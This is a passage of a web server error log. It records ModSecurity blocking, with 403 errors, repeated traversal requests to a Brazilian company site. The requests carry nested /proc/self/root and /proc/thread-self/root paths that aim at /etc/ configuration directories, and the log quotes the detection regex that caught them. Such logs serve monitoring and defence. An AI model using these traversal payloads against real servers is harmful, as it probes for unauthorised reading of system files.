"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp26dY0UrI5A3LftIxwCAAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:57:01.284522 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:40294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp27eyqAr6etmhZHNqR8wAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:57:05.183264 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:40308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp28da6ubjKNq_cu4ZsagAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:57:07.708527 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:40322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp289a6ubjKNq_cu4ZscAAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:57:09.014939 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:40338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp29eoXxyEfFpUF8f9DRgAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:57:31.914635 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.243.128:46100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3C0zinOy1jxa1j4fpiAAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:57:35.351080 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.243.128:56028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3D9Y0UrI5A3LftIxwEwAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:57:39.847132 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:56032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3E_u8EFLIOrSqIpvbeQAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:57:43.310992 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.243.128:47354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3F0zinOy1jxa1j4fpiwAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:57:44.585557 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:47366] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3GOoXxyEfFpUF8f9DTQAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:57:45.855459 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.243.128:47382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3Gew_le52K8_3pV227QAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:57:49.730290 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:47576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3HQkwaGbbGflqUZDn1QAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:57:50.705183 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.243.128:47390] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3Huw_le52K8_3pV228gAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:57:51.997237 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:53482] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3H-yqAr6etmhZHNqSDAAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:57:53.363216 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.243.128:53498] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3ISmAPhZkrhU8w4lEjgAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:57:58.675691 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:47228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3JuyqAr6etmhZHNqSEwAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:57:59.026737 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:53502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3J-w_le52K8_3pV22-AAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:58:04.596877 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:36336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3LMdf6f5d65gmYZSpYgAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:58:05.758966 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:39198] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3LeoXxyEfFpUF8f9DVQAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:58:05.955350 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:36346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3LQkwaGbbGflqUZDn2AAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:58:07.290448 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:36352] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3L9a6ubjKNq_cu4ZshgAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:58:08.587291 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:36360] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3MOyqAr6etmhZHNqSFAAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:58:12.706669 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:39212] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3MwkwaGbbGflqUZDn3gAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:58:15.244354 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:52196] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3N9a6ubjKNq_cu4ZsiQAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
